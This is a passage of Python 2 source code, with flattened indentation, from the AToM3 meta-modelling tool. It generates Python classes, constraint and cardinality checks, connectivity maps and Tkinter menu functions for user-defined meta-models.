if theType == "ATOM3List": # check for its initial value, and repeat for each item
# import the list's type:
theType = item.itemType.__name__
if not theType in list: list.append(theType)
if theType == "ATOM3Attribute" : # check for it is an Attribute, we have to add each available type...
self.addAllTypes2List(list)
def visitorOnAttributes(self, f, UMLobject, function):
"""
iterates over the attributes of type ATOM3Attribute of the object UMLobject, performing a certain function
"""
self.writed = 0
counter = 0 # an auxiliary counter
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if type[0] == 'ATOM3Attribute':
function(f, UMLobject.getAttrValue(attr), counter) # perform function
counter = counter + 1 # increment counter
elif type[0] == 'ATOM3List' and type[1] == 'ATOM3Attribute': # A list of generative elements...
items = UMLobject.getAttrValue(attr).getValue() # obtain a list of generative elements
for item in items: # look over the array
function(f, item, counter)
counter = counter + 1
return counter
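# Usage sketch: genCodeFor and genASGCode below invoke this as, e.g.,
#   self.visitorOnAttributes(f, entity, self.genImport)
# so the visitor is called once per ATOM3Attribute with (f, item, counter);
# the return value is the total number of attributes visited.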
def writeActionConstraint (self, file, value, which):
"""
writes part of the function to evaluate local constraints
These are 'visitor' methods called by visitorOnConstraints for code generation purposes.
"""
listAct, selAct = value[3]
listKnd, selKnd = value[2]
# Abort if there's no code...
tempCode = value[4]
if(tempCode == None):
return
tempCode = tempCode.replace( '\n', '')
tempCode = tempCode.replace( ' ', '')
tempCode = tempCode.replace( '\t', '')
tempCode = tempCode.replace( '\r', '')
if(len(tempCode) == 0):
return
if listKnd[selKnd] == which:
# iterate on the specified event...
file.write(" if actionID == ")
conta = 0
writed = 0
for event in selAct:
if event == 1:
if not writed:
file.write("self."+listAct[conta])
else:
file.write(" or actionID == self."+listAct[conta])
writed = 1
conta = conta + 1
file.write(":\n")
file.write(" res = self."+value[0]+"(params)\n")
file.write(" if res: return res\n")
def writeConstraintCode (self, file, value, unUsed):
"""
writes the constraint code.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
# Abort if there's no code...
tempCode = value[4]
if(tempCode == None):
return
tempCode = tempCode.replace( '\n', '')
tempCode = tempCode.replace( ' ', '')
tempCode = tempCode.replace( '\t', '')
tempCode = tempCode.replace( '\r', '')
if(len(tempCode) == 0):
return
file.write (" def "+value[0]+"(self, params):\n")
file.write (" "+string.replace(value[4],'\n', '\n '))
file.write ("\n\n")
def visitorOnConstraints (self, which, file, UMLobject, function ):
"""
Generates code for the constraints. In a 'visitor' pattern way.
"""
# find a list of constraints, or a single constraint generator
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if( type[0] == 'ATOM3Constraint' ):
value = UMLobject.getAttrValue(attr).getValue() # obtain the value
function(file, value, which)
elif( type[0] == 'ATOM3List' and type[1] == 'ATOM3Constraint' ):
items = UMLobject.getAttrValue(attr).getValue()
for item in items:
value = item.getValue()
function(file, value, which)
def writeDirectionalCheck(self, file, value, counter, direct):
"""
Generates type checking for the connection direction
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
# value is a tuple with (className, direction, minValue, maxValue)
className, direction, minVal, maxVal = value # unpack the values
if direction[1] == direct: # check the constraint direction
if self.writedDirection == 0: # if it is the 1st., begin the if
file.write(" if ")
self.writedDirection = 1
else:
file.write(" and ")
file.write("( last.getClass()!='"+value[0]+"') ")
def writeObjectTypeCheck(self, file, value, counter):
"""
Generates the type checking for the connection
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
if counter == 0: # if it is the first cardinality, add some preliminary code
file.write(" if selfPosition == 'SOURCE':\n")
file.write(" last=self.out_connections_[len(self.out_connections_)-1]\n")
file.write(" else:\n")
file.write(" last=self.in_connections_[len(self.in_connections_)-1]\n")
file.write(" if ")
else:
file.write(" and ")
file.write("( last.getClass()!='"+value[0]+"') ")
def writeSoftCardinalityCheck(self, file, value, counter):
"""
Generates soft (not taking into account minimum values) cardinality checking
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
# value is a tuple (<objectCLass>, <direction>, <minValue>, <maxValue>)
objectClass, direction, minValue, maxValue = value # unpack ATOM3Connection value
file.write(" counter = 0\n") # cardinality counter
if direction[1] == 0: # From Entity TO relationship
file.write(" for item in self.in_connections_:\n") # WE ARE A RELATIONSHIP
else:
file.write(" for item in self.out_connections_:\n")
file.write(" if '"+ objectClass +"'== item.getClass(): counter = counter+1\n")
if not maxValue in ["n", "N", "m", "M"] :
file.write(" if counter > "+maxValue+":\n")
file.write(" return ( 'Number of "+objectClass+" objects exceeded!', '')\n")
def writeHardCardinalityCheck(self, file, value, counter):
"""
Generates hard (taking into account minimum values) cardinality checking
I THINK THIS METHOD IS NOT USED ANY MORE.
"""
# value is a tuple (<objectCLass>, <direction>, <minValue>, <maxValue>)
objectClass, direction, minValue, maxValue = value # unpack ATOM3Connection value
file.write(" counter = 0\n")
if direction[1] == 0: # From Entity TO relationship
file.write(" for item in self.in_connections_:\n") # WE ARE A RELATIONSHIP
else:
file.write(" for item in self.out_connections_:\n")
file.write(" if '"+ objectClass +"'== item.getClass(): counter = counter+1\n")
if not maxValue in ["n", "N", "m", "M"] :
file.write(" if counter > "+maxValue+":\n")
file.write(" return ( 'Number of "+objectClass+" objects exceeded!', '')\n")
if not minValue in ["n", "N", "m", "M"]:
file.write(" if counter < "+minValue+":\n")
file.write(" return ( 'Number of "+objectClass+" objects insuficient("+str(minValue)+" are needed)!', '')\n")
else:
file.write(" if counter == 0:\n")
file.write(" return ( 'Number of "+value[0]+" objects insuficient("+str(minValue)+" are needed)!', '')\n")
def visitorOnCardinality (self, file, UMLobject, function, param = None ):
"""
Generates constraints from the cardinality attributes found, in a 'visitor pattern way'
"""
counter = 0
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if type[0] == 'ATOM3Connection':
value = UMLobject.getAttrValue(attr).getValue() # obtain the value
if param:
function(file, value, counter, param )
else:
function(file, value, counter )
counter = counter + 1
elif type[0] == 'ATOM3List' and type[1] == 'ATOM3Connection':
items = UMLobject.getAttrValue(attr).getValue()
for item in items:
value = item.getValue()
if param != None:
function(file, value, counter, param)
else:
function(file, value, counter)
counter = counter+1
return counter
def genASGCode(self, cardConstObjects, ASGroot=None):
"""
Generates Python code for the ASGroot node
"""
if(not ASGroot):
ASGroot = self.ASGroot
fileName = "ASG_"+ASGroot.keyword_.toString()+".py"
if self.console: self.console.appendText('Generating file '+fileName+' in directory '+self.codeGenDir)
f = open( os.path.join( self.codeGenDir,fileName) , "w+t" )
f.write('"""\n')
f.write("__"+ fileName +"_____________________________________________________\n")
f.write("\n")
f.write("Automatically generated AToM3 ASGroot node (DO NOT MODIFY DIRECTLY)\n")
f.write("Author: "+USER_NAME+"\n")
f.write("Modified: "+time.asctime()+"\n")
f.write("__"+ len(fileName)*"_" +"_____________________________________________________\n")
f.write('"""\n')
f.write("from ASG import *\n")
f.write("from ATOM3Type import *\n")
self.importedTypes = [] # list where the necessary types will be placed
self.visitorOnAttributes( f, ASGroot, self.genImport)
# now write each type of the list to the file...
for typename in self.importedTypes:
f.write("from "+typename+" import *\n")
f.write("class ASG_"+ASGroot.keyword_.toString()+"(ASG, ATOM3Type):\n\n") # generate class definition
f.write(" def __init__(self, parent= None, ASGroot = None):\n") # declare init method
metaModelName = ASGroot.keyword_.toString() # get the metamodel name
f.write(" ASG.__init__(self, '"+metaModelName+"', ASGroot, ['ASG_"+ASGroot.keyword_.toString()+"'") # add also the own name (for hierarchical modelling)
# add the node types...
counter = 0
for nodeType in ASGroot.nodeTypes: # for each node type
for UMLobject in ASGroot.listNodes[nodeType]: # for each object
if UMLobject.keyword_: # Added 7 April 2003 by JL
f.write(" ,")
f.write("'"+UMLobject.keyword_.toString()+"'")
counter = counter + 1
f.write("])\n\n")
f.write(" ATOM3Type.__init__(self)\n")
self.genASGNodeCode(f, ASGroot, 1) # != None -> globalModel
f.write("\n\n")
f.close()
def genCodeFor ( self, entity, objsWithCardConstraints ):
"""
Generates Python code for the entity
"""
# check
if not entity.keyword_: # entity does not have a keyword, raise an error, we cannot generate code
tkMessageBox.showerror(
"Error: entity has no keyword!",
"Entity does not have a keyword, " + str(entity),
parent = self
)
return
# generate code for the ATOM3Links, because a graphical file must be generated
for attr in entity.generatedAttributes.keys():
type = entity.generatedAttributes[attr] # A tuple with the types...
if type[0] == 'ATOM3Link': # ey! an ATOM3Link has been found...
at3link = entity.getAttrValue(attr)
if at3link and not at3link.isNone(): # if it has some value...
entity.getAttrValue(attr).genGraphicalFile( self.codeGenDir, self.parent )
else:
tkMessageBox.showerror(
"Error: entity has no graphical appearance!",
"Entity "+entity.keyword_.toString()+" does not have a graphical appearance",
parent = self
)
return
fileName = entity.keyword_.toString()+".py" # Prepare file name, with the keyword
if self.console: self.console.appendText('Generating file '+fileName+' in directory '+self.codeGenDir)
filePath = os.path.join( self.codeGenDir, fileName)
f = open( filePath, "w+t") # open file name and print header
#f.write("# __"+ fileName +"_____________________________________________________\n")
f.write('"""\n')
f.write("__"+ fileName +"_____________________________________________________\n")
f.write("\n")
f.write("Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)\n")
f.write("Author: "+USER_NAME+"\n")
f.write("Modified: "+time.asctime()+"\n")
f.write("__"+ len(fileName)*"_" +"_____________________________________________________\n")
f.write('"""\n')
f.write("from ASGNode import *\n\n") # generate imports
f.write("from ATOM3Type import *\n\n") # generate imports
self.importedTypes = [] # list where the necessary types will be placed
self.visitorOnAttributes( f, entity, self.genImport) # generate import for ATOM3Types
# now write each type of the list to the file...
for typename in self.importedTypes:
f.write("from "+typename+" import *\n")
# Open the graphical appearance file (may not exist)
graphicName = "graph_"+entity.keyword_.toString()+".py"
if( os.path.exists( os.path.join( self.codeGenDir, graphicName ) ) ):
hasGraph = True
f.write("from graph_"+entity.keyword_.toString()+" import *\n")
# Not there... doh!
else:
hasGraph = False
# if we should generate graphics, then give a warning!
if self.genGraphics: # generate == Yes
tkMessageBox.showwarning(
"Warning: Undefined icon! ",
"Entity '"+entity.keyword_.toString()+"' does not have an icon",
parent = self
)
f.write("class "+entity.keyword_.toString()+"(ASGNode, ATOM3Type):\n\n") # generate class definition
f.write(" def __init__(self, parent = None):\n") # declare init method
f.write(" ASGNode.__init__(self)\n")
f.write(" ATOM3Type.__init__(self)\n")
if hasGraph: # then write down the class name
f.write(" self.graphClass_ = graph_"+entity.keyword_.toString()+"\n")
#f.write(" self.isGraphObjectVisual = "+str(entity.isGraphObjectVisual)+"\n")
# See HierarchicalASGNode.py for hierarchical code...
entity._generateHierarchicalSemanticCode(f, ' ')
self.genASGNodeCode(f, entity) # call method to generate the rest of the code
f.write("\n\n")
f.close()
def existGenerativeAttributes(self):
"""
Returns 1 if the current model has some generative attributes...
"""
# first look in the ASGroot
if self.ASGroot.hasGenerativeAttributes(): return 1
# now look in each entity of the model...
for entype in self.ASGroot.listNodes.keys():
for entity in self.ASGroot.listNodes[entype]:
if entity.hasGenerativeAttributes(): return 1
return 0
def genButtons(self, ASGroot=None):
"""
generates the file which has the actions to create the defined entities.
"""
if(ASGroot == None):
ASGroot = self.ASGroot
# get the name from the model name...
nameButtonBar = ASGroot.keyword_.toString()+"_MM"
if self.console: self.console.appendText('Generating file '+nameButtonBar+'.py in directory '+self.codeGenDir+' (Meta-model file)')
file = open( os.path.join( self.codeGenDir,nameButtonBar+".py"), "w+t" )
# see if we have to import graph_ASG_<nameButtonBar>, or the default graph_ASG_ERmetaMetaModel
# try to open the file to see if it exists
grFName = 'graph_ASG_'+ASGroot.keyword_.toString()
# check if a drawing was made, and if not, use the default drawing
# try to open it...
try:
f = open (grFName+'.py', "r+t")
except IOError: # not found, so use default drawing file
grFName = 'graph_ASG_ERmetaMetaModel'
else:
f.close()
file.write('"""\n')
file.write("__"+ nameButtonBar+".py______________________________________________________\n")
file.write("\n")
file.write("Automatically generated AToM3 MetaModel (DO NOT MODIFY DIRECTLY)\n")
file.write("Author: "+USER_NAME+"\n")
file.write("Modified: "+time.asctime()+"\n")
file.write("__"+ len(nameButtonBar+".py")*"_" +"______________________________________________________\n")
file.write('"""\n')
file.write('from ASG_'+ASGroot.keyword_.toString()+' import *\n') # the class of root node
file.write('from '+grFName+' import *\n') # the class of the graphic for the root node
file.write('from Tkinter import *\n')
file.write('from ATOM3TypeInfo import *\n')
file.write('from ATOM3String import *\n')
file.write('from StatusBar import *\n')
file.write('from ATOM3TypeDialog import *\n\n')
# import all the ASGNodes...
for UMLclass in ASGroot.nodeTypes:
for obj in ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003
file.write('from '+obj.keyword_.toString()+' import *\n')
# check if the file with the graphical class exists
nameFile = "graph_"+obj.keyword_.toString()+".py"
try:
f = open (nameFile, "r+t")
except IOError:
pass
else:
f.close ()
file.write('from graph_'+obj.keyword_.toString()+' import *\n')
# generate function "createNewASGroot(self):"
file.write('def createNewASGroot(self):\n')
file.write(' return ASG_'+ASGroot.keyword_.toString()+'(self, None)\n\n')
# generate function "createModelMenu"
file.write('def createModelMenu(self, modelMenu):\n')
file.write(' "Creates a customized Model Menu for the actual formalism"\n')
# Modified by Denis Dube, summer 2004: why the heck do you declare a new modelMenu
# when you're given one as a parameter? It definitely doesn't work at all on my Win XP box
# if you do that.
#file.write(' modelMenu = Menu(self.mmtoolMenu, tearoff=0)\n')
for UMLclass in ASGroot.nodeTypes:
for obj in ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003
file.write(' modelMenu.add_command(label="New '
+obj.keyword_.toString()
+'", command=lambda x=self: x.createNew'
+obj.keyword_.toString()+'(x, 100, 100) )\n') #
# generate the function setConnectivity
self.genSetConnectivity(file)
# generate the functions 'createNew<class>(self, wherex, wherey):
for UMLclass in ASGroot.nodeTypes:
for obj in ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
file.write('def createNew'+obj.keyword_.toString()
+'(self, wherex, wherey, screenCoordinates = 1):\n')
file.write(' self.fromClass = None\n')
file.write(' self.toClass = None\n')
file.write(' # try the global constraints...\n')
file.write(' res = self.ASGroot.preCondition(ASG.CREATE)\n')
file.write(' if res:\n')
file.write(' self.constraintViolation(res)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' return\n\n')
file.write(' new_semantic_obj = '+obj.keyword_.toString()+'(self)\n')
file.write(' res = new_semantic_obj.preCondition ( ASGNode.CREATE )\n')
file.write(' if res: return self.constraintViolation(res)\n')
file.write(' new_semantic_obj.preAction ( ASGNode.CREATE ) \n\n')
file.write(' ne = len(self.ASGroot.listNodes["'+obj.keyword_.toString()+'"])\n')
file.write(' if new_semantic_obj.keyword_:\n')
file.write(' new_semantic_obj.keyword_.setValue(new_semantic_obj.keyword_.toString()+str(ne))\n')
file.write(' if screenCoordinates:\n')
file.write(' new_obj = graph_'+obj.keyword_.toString()+'(self.UMLmodel.canvasx(wherex), self.UMLmodel.canvasy(wherey), new_semantic_obj)\n')
file.write(' else: # already in canvas coordinates\n')
file.write(' new_obj = graph_'+obj.keyword_.toString()+'(wherex, wherey, new_semantic_obj)\n')
file.write(' new_obj.DrawObject(self.UMLmodel, self.editGGLabel)\n')
file.write(' self.UMLmodel.addtag_withtag("'+obj.keyword_.toString()+'", new_obj.tag)\n')
file.write(' new_semantic_obj.graphObject_ = new_obj\n')
file.write(' self.ASGroot.addNode(new_semantic_obj)\n')
file.write(' res = self.ASGroot.postCondition(ASG.CREATE)\n')
file.write(' if res:\n')
file.write(' self.constraintViolation(res)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' return\n\n')
file.write(' res = new_semantic_obj.postCondition(ASGNode.CREATE)\n')
file.write(' if res:\n')
file.write(' self.constraintViolation(res)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' return\n')
file.write(' new_semantic_obj.postAction(ASGNode.CREATE)\n\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' if self.editGGLabel :\n')
file.write(' self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.CREATE)\n')
file.write(' else:\n')
file.write(' self.statusbar.event(StatusBar.MODEL, StatusBar.CREATE)\n')
file.write(' return new_semantic_obj\n')
# generate also the function "createNewModel" to allow hierarchical Modelling
file.write('def createNew_Model(self, wherex, wherey, screenCoordinates = 1):\n')
file.write(' self.toClass = None\n')
file.write(' self.fromClass = None\n')
file.write(' new_semantic_obj = ASG_'+ASGroot.keyword_.toString()+'(self)\n')
file.write(' ne = len(self.ASGroot.listNodes["ASG_'+ASGroot.keyword_.toString()+'"])\n')
file.write(' if new_semantic_obj.keyword_:\n')
file.write(' new_semantic_obj.keyword_.setValue(new_semantic_obj.keyword_.toString()+str(ne))\n')
file.write(' if screenCoordinates:\n')
file.write(' new_obj = '+grFName+'(self.UMLmodel.canvasx(wherex), self.UMLmodel.canvasy(wherey), new_semantic_obj)\n')
file.write(' else: # already in canvas coordinates\n')
file.write(' new_obj = '+grFName+'(wherex, wherey, new_semantic_obj)\n')
file.write(' new_obj.DrawObject(self.UMLmodel, self.editGGLabel)\n')
file.write(' self.UMLmodel.addtag_withtag("ASG_'+ASGroot.keyword_.toString()+'", new_obj.tag)\n')
file.write(' new_semantic_obj.graphObject_ = new_obj\n')
file.write(' self.ASGroot.addNode(new_semantic_obj)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' if self.editGGLabel :\n')
file.write(' self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.CREATE)\n')
file.write(' else:\n')
file.write(' self.statusbar.event(StatusBar.MODEL, StatusBar.CREATE)\n')
file.write(' return new_semantic_obj\n')
# generate fillTypesInformation function
file.write('def fillTypesInformation(self):\n')
file.write(' objs = []\n')
itemList = self.typeList.getValue() # obtain the item list
for item in itemList: # obtain the value (ATOM3TypeInfo) of each item
file.write(' obj = ATOM3TypeInfo(self)\n')
file.write(' params = []\n')
value = item.getValue()
for param in value[2]: # if we have parameters
file.write(' param = ATOM3String("'+param.toString()+'")\n')
file.write(' params.append(param)\n')
file.write(' obj.setValue(("'+value[0]+'", "'+value[1]+'", params, '+str(value[3])+' ))\n')
file.write(' objs.append(obj)\n')
file.write(' self.typeList.setValue(objs)\n\n')
def genSetConnectivity(self, file):
"""
Generates the setConnectivity function in the file.
"""
file.write('def setConnectivity(self):\n')
indent = ' ' # set the indentation to be used in the function
self.__genConnectivityMap(file, indent)
file.write(indent+'\n')
self.__genCardinalityTable(file, indent)
file.write(indent+'\n')
self.__genEntitiesInMetaModel(file, indent)
file.write(indent+'\n')
def __reachesDirectly (self, nobj1, nobj2, listOfObjects, direc):
"""
Added 12 Sept 2002
Returns 1 if nobj1 can reach nobj2 directly.
nobj1 and nobj2 are strings.
listOfObjects is a list with the real objects
        direc is the direction of the connection: 1 is from nobj1 to nobj2, 0 is the reverse
"""
for obj in listOfObjects:
if obj.keyword_.toString() == nobj1: # we've found the object...
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection':
lc = obj.getAttrValue(attr).getValue()
for conn1 in lc:
name, direc1, min1, max1 = conn1.getValue() # unwrap it
if name == nobj2 and direc1[1] == direc: return 1
return 0
def __genConnectivityMap(self, file, indent):
"""
        Generates code in the file to build the 'ConnectivityMap' dictionary
"""
entities = {}
connections = [] # this will be a list with all the entities with connection possibilities...
        for UMLclass in self.ASGroot.nodeTypes: # build the dictionary, searching for 'entities'
for obj in self.ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
hasConns = 0
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3Connection' or (obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection'):
hasConns = 1
break
if hasConns: connections.append(obj)
entities[obj.keyword_.toString()] = {}
        # initialize every dictionary entry to an empty list
for ent1 in entities.keys():
for ent2 in entities.keys():
entities[ent1][ent2] = []
for obj in connections: # for each element with connections...
#if obj.keyword_: # Added 7 April 2003 by JL
objName = obj.keyword_.toString() # get its name
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection':
lc = obj.getAttrValue(attr).getValue() # get the list of connections
for conn1 in lc: # for each connection...
name1, direc1, min1, max1 = conn1.getValue() # unwrap it
                        lc2 = list(lc) # copy the list so conn1 can be removed safely
                        lc2.remove(conn1)
if name1 in entities.keys():
for conn2 in lc2:
name2, direc2, min2, max2 = conn2.getValue()
if name2 in entities[name1].keys() and name2 in entities.keys() and direc1 != direc2 and not self.__reachesDirectly(name1, name2, connections, direc2[1]): # last condition added 12 Sept 2002
ntuple = (objName, "self.createNew"+objName)
if direc1[1] == 1:
if not ntuple in entities[name1][name2]:
entities[name1][name2].append(ntuple)
else:
if not ntuple in entities[name2][name1]:
entities[name2][name1].append(ntuple)
# now, write the dictionary in the file...
for name1 in entities.keys():
file.write(indent+"self.ConnectivityMap['"+name1+"']={")
outcont = 0
for name2 in entities[name1].keys():
if outcont > 0: file.write("\n"+indent+" ,'"+name2+"': [")
else: file.write("\n"+indent+" '"+name2+"': [")
outcont = outcont + 1
count = 0
for element in entities[name1][name2]:
if count > 0: file.write(", ")
file.write("( '"+element[0]+"', "+element[1]+")")
count = count + 1
file.write("]")
file.write(" }\n")
def __genEntitiesInMetaModel(self, file, indent):
"""
Generates code in file to write the 'entitiesInMetaModel' list
"""
metaModelName = self.ASGroot.keyword_.toString()
file.write(indent+"self.entitiesInMetaModel['"+metaModelName+"']=[")
counter = 0
for entity1 in self.ASGroot.nodeTypes:
for obj1 in self.ASGroot.listNodes[entity1]:
if obj1.keyword_: # Added 7 April 2003 by JL
if counter > 0: file.write(", ")
file.write ('"'+obj1.keyword_.toString()+'"')
counter = counter + 1
file.write("]\n\n")
def __genCardinalityTable(self, file, indent):
"""
Generates code in file to write the 'CardinalityTable' dictionary
"""
cardTable = {}
# in this function we also include the filling of the dictionary self.CardinalityTable...
for entity1 in self.ASGroot.nodeTypes:
for obj1 in self.ASGroot.listNodes[entity1]:
if obj1.keyword_: # Added 7 April 2003 by JL
name1 = obj1.keyword_.toString()
cardTable[name1] = {}
for entity2 in self.ASGroot.nodeTypes:
for obj2 in self.ASGroot.listNodes[entity2]:
if obj2.keyword_: # Added 7 April 2003 by JL
name2 = obj2.keyword_.toString()
                                cardTable[name1][name2] = [] # initialize to an empty list
        for UMLclass in self.ASGroot.nodeTypes: # build the dictionary, searching for 'entities'
for obj in self.ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
objName = obj.keyword_.toString() # get the entity name
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection':
lc = obj.getAttrValue(attr).getValue() # get the list of connections
for conn1 in lc:
name1, direc1, min1, max1 = conn1.getValue()
cardTable[objName][name1].append((min1, max1, direc1[0][direc1[1]]))
for UMLclass in self.ASGroot.nodeTypes:
for obj in self.ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
name1 = obj.keyword_.toString()
file.write(indent+"self.CardinalityTable['"+name1+"']={")
count = 0
for UMLclass1 in self.ASGroot.nodeTypes:
for obj2 in self.ASGroot.listNodes[UMLclass1]:
if obj2.keyword_: # Added 7 April 2003 by JL
name2 = obj2.keyword_.toString()
if count > 0: file.write("\n"+indent+" ,'"+name2+"': "+ str(cardTable[name1][name2]))
else: file.write("\n"+indent+" '"+name2+"': "+ str(cardTable[name1][name2]))
count = count + 1
file.write(" }\n")
def editTypes(self):
"""
        Opens a dialog to edit the types available in the session. If the user creates a new one,
        the graph grammar is then called to generate code for the type.
"""
from TypeCodeGen import *
ma = ATOM3TypeDialog(self, self.typeList, ATOM3TypeDialog.OPEN )# edit types...
# generate code for the edited type...
newTypes = self.typeList.getValue() # obtain the list of existing types
oldTypes = []
for name in self.types.keys():
className = str(self.types[name][0])
oldTypes.append(className[string.rfind(className,".")+1:])
newTypesNames = []
for type in newTypes: # search for new defined types
typeName = type.getValue()[1]
newTypesNames.append(typeName)
if not typeName in oldTypes: # This is a new Type!
self.GraphGrammars = [ TypeCodeGen(self)]
grs = GraphRewritingSys(self, self.GraphGrammars, type.typeModel )
grs.evaluate(stepByStep = 0, moveEntities = 1, execute = grs.SEQ_MANUAL, graphics = 0) # no graphics (the canvas with the model is closed!)
self.newTypes.append((type.getValue()[0], typeName, (), 1)) # add the new type to the list of newly created types
# delete the deleted types...
elements2delete = []
for nt in self.newTypes:
            _, name, args, flag = nt # the second field holds the type name
if not name in newTypesNames:
elements2delete.append(nt)
for delElem in elements2delete: self.newTypes.remove(delElem) # delete the element
for type in self.types.keys(): # remove all elements
del self.types[type]
self.fillDictionaryWithTypes() # fill the dictionary again with the types
def add2Types(self, ASGNodeType, oldName):
"""
        Checks whether the object whose name was oldName is included in the list of types and, if not, includes it.
"""
# create a new ATOM3TypeInfo to add it to the list
newType = ATOM3TypeInfo(self)
newType.setValue( (ASGNodeType.keyword_.toString(), ASGNodeType.keyword_.toString(), () ))
# generate code for the class...
self.genCodeFor( ASGNodeType )
# import the class file.
exec "from "+ASGNodeType.keyword_.toString()+" import *\n"
self.types[ASGNodeType.keyword_.toString()] = ( eval(ASGNodeType.keyword_.toString()), (self, ))
# see if the name has changed
if (oldName in self.types.keys()) and (oldName != ASGNodeType.keyword_.toString()):
del self.types[oldName]
os.remove( oldName+".py")
typesInList = self.typeList.getValue() # the ATOM3TypeInfo objects in the list
counter = 0
for typ in typesInList:
            val = typ() # get the object's value
if val[0] == oldName: # we have found it
typesInList[counter] = newType
break
counter = counter + 1
def newModeUMLrelationship(self):
"""
        Enters the NEWUMLrelationship mode
"""
self.mode = NEWUMLrelationship
def copyFromLHS(self):
"""
        Copies the LHS of a rule into the RHS; the information is taken from self.GGSemanticRule.
        Added 20/July/2002
"""
clonedObjects = []
# A list with the cloned objects
for nodeType in self.GGSemanticRule.LHS.listNodes.keys():
for node in self.GGSemanticRule.LHS.listNodes[nodeType]:
newObj = node.clone()
newObj.parent = self # change the object's parent to myself
newObj.editGGLabel = ASG.INRHS # This node is in RHS
newObj.GGset2Any = {} # reinitialize GG info
newObj.graphObject_ = newObj.graphClass_(node.graphObject_.x, node.graphObject_.y, newObj) # create the graphical object
#newObj.graphObject_.DrawObject(self.UMLmodel, self.editGGLabel)
#self.UMLmodel.addtag_withtag(nodeType, newObj.graphObject_)
try:
self.ASGroot.addNode(newObj)
except:
tkMessageBox.showerror(
"Copy LHS",
"ERROR: copy LHS failed since a formalism open in the LHS is"
+ " not currently open in the RHS\n\nPlease open it now...",
parent=self)
return
node.clonedObject = newObj # keep a pointer to the cloned object
clonedObjects.append(newObj)
# copy also the (semantic) connections
for obj in clonedObjects:
obj.in_connections_nw = []
for icn in obj.in_connections_:
obj.in_connections_nw.append(icn.clonedObject)
obj.in_connections_ = obj.in_connections_nw
obj.out_connections_nw = []
for icn in obj.out_connections_:
obj.out_connections_nw.append(icn.clonedObject)
obj.out_connections_ = obj.out_connections_nw
del obj.in_connections_nw
del obj.out_connections_nw
# Make sure that the RHS has the appropriate starting GG label #
maxEditLabel = 0
for nodeType in self.GGSemanticRule.RHS.listNodes.keys():
for node in self.GGSemanticRule.RHS.listNodes[nodeType]:
maxEditLabel = max(maxEditLabel, node.GGLabel.getValue())
self.GGSemanticRule.RHS.minimumGG = maxEditLabel + 1
# delete the pointer to the cloned object
for nodeType in self.GGSemanticRule.LHS.listNodes.keys():
for node in self.GGSemanticRule.LHS.listNodes[nodeType]:
del node.clonedObject
# show the copied objects in the canvas
self.ASGroot.writeContents(self, self.genGraphics, 1, clonedObjects)
def reDrawGGLabels(self):
"""
redraws the GGLabels of each drawn entity, if appropriate
"""
if self.editGGLabel:
for nt in self.ASGroot.listNodes.keys():
for node in self.ASGroot.listNodes[nt]:
if node.graphObject_:
node.graphObject_.drawGGLabel(self.UMLmodel)
for drawnAttribute in node.graphObject_.attr_display.keys():
if node.getAttrValue(drawnAttribute).isNone() and self.editGGLabel == ASG.INLHS :
node.graphObject_.ModifyAttribute(drawnAttribute, "<ANY>")
elif self.editGGLabel== ASG.INRHS: # Modified 22 July, JL
if node.GGset2Any.has_key(drawnAttribute):
if node.GGset2Any[drawnAttribute].Copy.getValue()[1]:
node.graphObject_.ModifyAttribute(drawnAttribute, "<COPIED>")
elif not node.GGset2Any[drawnAttribute].Specify.getValue()[4] in ["", "\n", None]:
node.graphObject_.ModifyAttribute(drawnAttribute, "<SPECIFIED>")
def drawEntity(self, semObject, className):
"""
draws an existing entity
"""
graphObj = semObject.graphObject_
if graphObj:
#print "<DEBUG> ATOM3.drawEntity() ", graphObj
graphObj.redrawObject(self.getCanvas(), self.editGGLabel)
# now evaluate ONLY the graphical constraints!
graphObj.postCondition(ASG.CREATE)
self.UMLmodel.addtag_withtag(className, graphObj.tag)
self.mode=self.IDLEMODE
def genASGNodeCode(self, f, UMLobject, isGlobalModel = None):
""" generates code for the lower meta-level of a user-defined entity.
- isGlobalModel may contain a list with the objects with cardinality constraints"""
self.theKeyword = None
f.write(" self.parent = parent\n")
# search for something that is of Attribute Type or List of Attribute
self.hasAppearance = None # flag that indicates if the entity has an attribute of type appearance
# if it has, it must have a keyword...
self.visitorOnAttributes( f, UMLobject, self.findKeywordAndIcons)
if self.hasAppearance and self.theKeyword == None: # ... check that it is the case...
tkMessageBox.showerror(
"need a keyword!",
"Entity "+UMLobject.keyword_.toString()+" did not define a keyword attribute",
parent = self
)
return 0
